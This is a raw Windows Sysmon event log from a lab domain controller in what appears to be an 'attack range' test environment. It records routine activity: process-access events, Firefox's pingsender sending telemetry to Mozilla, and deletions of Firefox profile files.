Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+2227102|C:\Program Files\Mozilla Firefox\xul.dll+2226f05|C:\Program Files\Mozilla Firefox\xul.dll+2226f51|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+1d18d20|C:\Program Files\Mozilla Firefox\xul.dll+188f2db|C:\Program Files\Mozilla Firefox\xul.dll+1a7c83c|C:\Program Files\Mozilla Firefox\xul.dll+1886716|C:\Program Files\Mozilla Firefox\xul.dll+1acb44d|C:\Program Files\Mozilla Firefox\xul.dll+17d27ff|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003E2E136109C) 154100x800000000000000043136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.411{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe109.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/9259c708-c135-4676-9fa5-ac1d38bfad68/event/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\9259c708-c135-4676-9fa5-ac1d38bfad68C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=81936B521FDC389CAE219484DEC34395,SHA256=6FB414545198766879F8420A7F09C5B06108A61310E7D113FB4565F1195D60AC,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000043135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.397{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4006-00000000AF02}6444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.396{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.396{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.396{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.395{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.395{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.395{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+2227102|C:\Program Files\Mozilla Firefox\xul.dll+2226f05|C:\Program Files\Mozilla Firefox\xul.dll+2226f51|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+1d18d20|C:\Program Files\Mozilla Firefox\xul.dll+188f2db|C:\Program Files\Mozilla Firefox\xul.dll+1a7c83c|C:\Program Files\Mozilla Firefox\xul.dll+1886716|C:\Program Files\Mozilla Firefox\xul.dll+1acb44d|C:\Program Files\Mozilla Firefox\xul.dll+17d27ff|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003E2E136109C) 154100x800000000000000043128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.394{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe109.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/210953fe-f940-4544-9df2-fdc6d8f261dd/new-profile/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\210953fe-f940-4544-9df2-fdc6d8f261ddC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=81936B521FDC389CAE219484DEC34395,SHA256=6FB414545198766879F8420A7F09C5B06108A61310E7D113FB4565F1195D60AC,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 23542300x800000000000000043127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.374{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_d3b575c8-0917-4242-bf5f-24498ba9c2e8.jsonMD5=26DA48E783D719365673ACFA9625D778,SHA256=067E532D79C1F73F4794AF45AF731448F4277D10D31DA65FBC523E1EA6CA65EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.237{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.236{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.210{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.210{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.210{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.184{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.099{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walMD5=38F03FC5F4F77AEFF855771C975BE228,SHA256=46939A9A09F34CA241B5E883FDDD1C8261D75E13E9941142CC5D8431EC48D980,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.099{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=BF633B00E1C3DB9CB1B015B5651A0ED3,SHA256=057640B0540DEAC569B5E71A1A618348B944ADCCEBBE0BBCBE7133B018BD5B48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.083{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.083{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.083{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\favicons.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.083{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\places.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - 